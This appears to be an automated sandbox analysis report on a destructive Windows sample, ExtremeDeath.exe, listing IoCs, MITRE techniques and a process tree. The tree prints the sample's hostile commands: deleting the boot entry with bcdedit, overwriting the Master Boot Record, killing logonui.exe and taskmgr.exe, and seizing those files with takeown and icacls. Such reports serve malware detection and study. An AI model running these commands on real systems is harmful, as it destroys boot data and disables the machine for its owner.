hxxps://github[.]com/pankoza-pl/malwaredatabase

Analysis

max time kernel
140s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
05-01-2023 18:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/pankoza-pl/malwaredatabase

Score

8^/10

bootkit discovery evasion exploit persistence upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Executes dropped EXE 12 IoCs

Processes:

TrashMBR.exebeeper.exeMouseError.exeMouseWarning.exeMouseAppIcon.exePlgBlt.exeMouseError.exeMouseWarning.exeMouseAppIcon.exeBitBlt.exeChromeRecovery.exeglitch.exe

pid	process
3648	TrashMBR.exe
3776	beeper.exe
3804	MouseError.exe
5060	MouseWarning.exe
3800	MouseAppIcon.exe
4612	PlgBlt.exe
4136	MouseError.exe
2600	MouseWarning.exe
4468	MouseAppIcon.exe
3584	BitBlt.exe
740	ChromeRecovery.exe
4496	glitch.exe

Possible privilege escalation attempt 6 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

4888 takeown.exe
4932 icacls.exe
5072 icacls.exe
4460 takeown.exe
5100 icacls.exe
3540 icacls.exe

pid	process
4888	takeown.exe
4932	icacls.exe
5072	icacls.exe
4460	takeown.exe
5100	icacls.exe
3540	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/952-134-0x0000000000400000-0x000000000051D000-memory.dmp	upx
behavioral2/memory/952-164-0x0000000000400000-0x000000000051D000-memory.dmp	upx

Modifies file permissions 1 TTPs 6 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

4460 takeown.exe
5100 icacls.exe
3540 icacls.exe
4888 takeown.exe
4932 icacls.exe
5072 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1876 bcdedit.exe
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

TrashMBR.exe

description ioc process

File opened for modification \??\PhysicalDrive0 TrashMBR.exe

pid	process
4460	takeown.exe
5100	icacls.exe
3540	icacls.exe
4888	takeown.exe
4932	icacls.exe
5072	icacls.exe

pid	process
1876	bcdedit.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	TrashMBR.exe

Drops file in Program Files directory 7 IoCs

Processes:

elevation_service.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\ChromeRecovery.exe	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\manifest.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\manifest.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\_metadata\verified_contents.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\_metadata\verified_contents.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\ChromeRecoveryCRX.crx	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\ChromeRecovery.exe	elevation_service.exe

Delays execution with timeout.exe 8 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1916 timeout.exe
1284 timeout.exe
940 timeout.exe
720 timeout.exe
1592 timeout.exe
3100 timeout.exe
3392 timeout.exe
4268 timeout.exe

pid	process
1916	timeout.exe
1284	timeout.exe
940	timeout.exe
720	timeout.exe
1592	timeout.exe
3100	timeout.exe
3392	timeout.exe
4268	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3888 taskkill.exe
4708 taskkill.exe
3164 taskkill.exe
2300 taskkill.exe
3556 taskkill.exe
Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings chrome.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4104 reg.exe

pid	process
3888	taskkill.exe
4708	taskkill.exe
3164	taskkill.exe
2300	taskkill.exe
3556	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	chrome.exe

pid	process
4104	reg.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe

pid	process
2200	chrome.exe
2200	chrome.exe
444	chrome.exe
444	chrome.exe
3144	chrome.exe
3144	chrome.exe
1020	chrome.exe
1020	chrome.exe
2660	chrome.exe
2660	chrome.exe
1508	chrome.exe
1508	chrome.exe
736	chrome.exe
736	chrome.exe
3448	chrome.exe
3448	chrome.exe
4732	chrome.exe
4732	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

PlgBlt.exe

pid process

4612 PlgBlt.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

444 chrome.exe
444 chrome.exe
444 chrome.exe
444 chrome.exe

pid	process
4612	PlgBlt.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exeWMIC.exetakeown.exetaskkill.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3556	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2880	WMIC.exe
Token: SeSecurityPrivilege	2880	WMIC.exe
Token: SeTakeOwnershipPrivilege	2880	WMIC.exe
Token: SeLoadDriverPrivilege	2880	WMIC.exe
Token: SeSystemProfilePrivilege	2880	WMIC.exe
Token: SeSystemtimePrivilege	2880	WMIC.exe
Token: SeProfSingleProcessPrivilege	2880	WMIC.exe
Token: SeIncBasePriorityPrivilege	2880	WMIC.exe
Token: SeCreatePagefilePrivilege	2880	WMIC.exe
Token: SeBackupPrivilege	2880	WMIC.exe
Token: SeRestorePrivilege	2880	WMIC.exe
Token: SeShutdownPrivilege	2880	WMIC.exe
Token: SeDebugPrivilege	2880	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2880	WMIC.exe
Token: SeRemoteShutdownPrivilege	2880	WMIC.exe
Token: SeUndockPrivilege	2880	WMIC.exe
Token: SeManageVolumePrivilege	2880	WMIC.exe
Token: 33	2880	WMIC.exe
Token: 34	2880	WMIC.exe
Token: 35	2880	WMIC.exe
Token: 36	2880	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2880	WMIC.exe
Token: SeSecurityPrivilege	2880	WMIC.exe
Token: SeTakeOwnershipPrivilege	2880	WMIC.exe
Token: SeLoadDriverPrivilege	2880	WMIC.exe
Token: SeSystemProfilePrivilege	2880	WMIC.exe
Token: SeSystemtimePrivilege	2880	WMIC.exe
Token: SeProfSingleProcessPrivilege	2880	WMIC.exe
Token: SeIncBasePriorityPrivilege	2880	WMIC.exe
Token: SeCreatePagefilePrivilege	2880	WMIC.exe
Token: SeBackupPrivilege	2880	WMIC.exe
Token: SeRestorePrivilege	2880	WMIC.exe
Token: SeShutdownPrivilege	2880	WMIC.exe
Token: SeDebugPrivilege	2880	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2880	WMIC.exe
Token: SeRemoteShutdownPrivilege	2880	WMIC.exe
Token: SeUndockPrivilege	2880	WMIC.exe
Token: SeManageVolumePrivilege	2880	WMIC.exe
Token: 33	2880	WMIC.exe
Token: 34	2880	WMIC.exe
Token: 35	2880	WMIC.exe
Token: 36	2880	WMIC.exe
Token: SeTakeOwnershipPrivilege	4460	takeown.exe
Token: SeDebugPrivilege	3888	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2752	WMIC.exe
Token: SeSecurityPrivilege	2752	WMIC.exe
Token: SeTakeOwnershipPrivilege	2752	WMIC.exe
Token: SeLoadDriverPrivilege	2752	WMIC.exe
Token: SeSystemProfilePrivilege	2752	WMIC.exe
Token: SeSystemtimePrivilege	2752	WMIC.exe
Token: SeProfSingleProcessPrivilege	2752	WMIC.exe
Token: SeIncBasePriorityPrivilege	2752	WMIC.exe
Token: SeCreatePagefilePrivilege	2752	WMIC.exe
Token: SeBackupPrivilege	2752	WMIC.exe
Token: SeRestorePrivilege	2752	WMIC.exe
Token: SeShutdownPrivilege	2752	WMIC.exe
Token: SeDebugPrivilege	2752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2752	WMIC.exe
Token: SeRemoteShutdownPrivilege	2752	WMIC.exe
Token: SeUndockPrivilege	2752	WMIC.exe
Token: SeManageVolumePrivilege	2752	WMIC.exe
Token: 33	2752	WMIC.exe
Token: 34	2752	WMIC.exe

Suspicious use of FindShellTrayWindow 45 IoCs

Processes:

chrome.exe

pid	process
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe

Suspicious use of SendNotifyMessage 28 IoCs

Processes:

chrome.exe

pid	process
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe
444	chrome.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

ExtremeDeath.exeMouseError.exeMouseWarning.exeMouseAppIcon.exePlgBlt.exeMouseError.exeMouseWarning.exeMouseAppIcon.exeBitBlt.exeglitch.exe

pid	process
952	ExtremeDeath.exe
3804	MouseError.exe
5060	MouseWarning.exe
3800	MouseAppIcon.exe
4612	PlgBlt.exe
4136	MouseError.exe
2600	MouseWarning.exe
4468	MouseAppIcon.exe
3584	BitBlt.exe
4496	glitch.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 444 wrote to memory of 2992	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 2992	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 1660	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 2200	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 2200	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe
PID 444 wrote to memory of 4244	444	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://github.com/pankoza-pl/malwaredatabase
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca1034f50,0x7ffca1034f60,0x7ffca1034f70
2⤵
PID:2992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1672 /prefetch:2
2⤵
PID:1660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2024 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2308 /prefetch:8
2⤵
PID:4244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:1
2⤵
PID:3056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3008 /prefetch:1
2⤵
PID:700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4256 /prefetch:8
2⤵
PID:1352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:8
2⤵
PID:4628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4380 /prefetch:8
2⤵
PID:2924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5100 /prefetch:8
2⤵
PID:4512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4368 /prefetch:8
2⤵
PID:820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
2⤵
PID:952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:8
2⤵
PID:3256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
2⤵
PID:2380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2720 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4276 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4832 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3784 /prefetch:8
2⤵
PID:2924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=808 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3084 /prefetch:8
2⤵
PID:2920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3772 /prefetch:8
2⤵
PID:2792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1560 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,570322480695403249,8846316544831854705,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5336 /prefetch:8
2⤵
PID:2312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5116

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3848

C:\Users\Admin\Downloads\ExtremeDeath (1)\ExtremeDeath.exe
"C:\Users\Admin\Downloads\ExtremeDeath (1)\ExtremeDeath.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:952

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\BC4C.tmp\BC4D.bat "C:\Users\Admin\Downloads\ExtremeDeath (1)\ExtremeDeath.exe""
2⤵
PID:4052

C:\Windows\system32\cscript.exe
cscript prompt.vbs
3⤵
PID:3460

C:\Windows\system32\bcdedit.exe
bcdedit /delete {current}
3⤵
- Modifies boot configuration data using bcdedit
PID:1876

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\TrashMBR.exe
TrashMBR.exe
3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:3648

C:\Windows\system32\taskkill.exe
taskkill /f /im logonui.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3556

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\logonui.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\logonui.exe /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5100

C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\logonui.exe /grant "everyone":F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3540

C:\Windows\system32\taskkill.exe
taskkill /f /im taskmgr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3888

C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2752

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\taskmgr.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4888

C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\taskmgr.exe /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4932

C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\taskmgr.exe /grant "everyone":F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5072

C:\Windows\system32\reg.exe
